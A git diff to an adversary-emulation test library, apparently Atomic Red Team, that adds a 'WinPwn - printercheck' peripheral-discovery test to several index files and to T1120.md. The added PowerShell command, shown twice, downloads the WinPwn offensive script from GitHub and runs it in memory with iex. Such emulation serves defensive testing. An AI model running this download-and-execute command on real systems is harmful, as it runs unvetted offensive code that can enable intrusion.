diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 22080376..8251d1b0 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -948,6 +948,7 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
+discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 1ad3c26f..d7ee4c6e 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -663,6 +663,7 @@ discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Win
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
+discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index a0ea2e1b..a8576c75 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1476,6 +1476,7 @@
- Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
+ - Atomic Test #2: WinPwn - printercheck [windows]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 06086313..6723ec61 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1068,6 +1068,7 @@
- Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
+ - Atomic Test #2: WinPwn - printercheck [windows]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #2: Process Discovery - tasklist [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index f4192311..1b350168 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -61209,6 +61209,18 @@ discovery:
@($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt
cleanup_command: Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore
name: powershell
+ - name: WinPwn - printercheck
+ auto_generated_guid: cb6e76ca-861e-4a7f-be08-564caa3e6f75
+ description: Search for printers / potential vulns using printercheck function
+ of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ printercheck -noninteractive -consoleoutput
+ name: powershell
T1069:
technique:
object_marking_refs:
diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md
index 18669e5e..fac03968 100644
--- a/atomics/T1120/T1120.md
+++ b/atomics/T1120/T1120.md
@@ -6,6 +6,8 @@
- [Atomic Test #1 - Win32_PnPEntity Hardware Inventory](#atomic-test-1---win32_pnpentity-hardware-inventory)
+- [Atomic Test #2 - WinPwn - printercheck](#atomic-test-2---winpwn---printercheck)
+
@@ -40,4 +42,34 @@ Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore
+
+
+
+## Atomic Test #2 - WinPwn - printercheck
+Search for printers / potential vulns using printercheck function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cb6e76ca-861e-4a7f-be08-564caa3e6f75
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+printercheck -noninteractive -consoleoutput
+```
+
+
+
+
+
+